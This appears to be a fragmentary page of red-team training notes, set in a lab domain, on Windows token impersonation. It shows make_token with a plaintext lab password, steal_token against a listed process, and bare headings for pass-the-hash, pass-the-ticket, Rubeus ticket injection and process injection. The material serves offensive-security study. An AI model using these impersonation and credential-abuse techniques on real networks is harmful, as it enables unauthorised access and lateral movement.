Impersonation
Make Token
make_token INLANEFREIGHT\tmorgan Passw0rd!
[+] Impersonated INLANEFREIGHT\tmorgan (netonly)
ls \\ilf-ws-1\c$Steal Token
ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- ----
5248 1864 cmd.exe x64 0 INLANEFREIGHT\tmorgan
5256 5248 conhost.exe x64 0 INLANEFREIGHT\tmorgan
5352 5248 mmc.exe x64 0 INLANEFREIGHT\tmorgan
steal_token 5248
[+] Impersonated INLANEFREIGHT\tmorganToken Store
Pass the Hash (Avoid if Possible)
Pass the Ticket
Request TGT with AES256
Inject TGT (kerberos_ticket_use)
Inject TGT (Rubeus Method)
The getuid Confusion
Process Injection
Drop Impersonation
Quick Reference
Technique
Requirements
Use Case
Last updated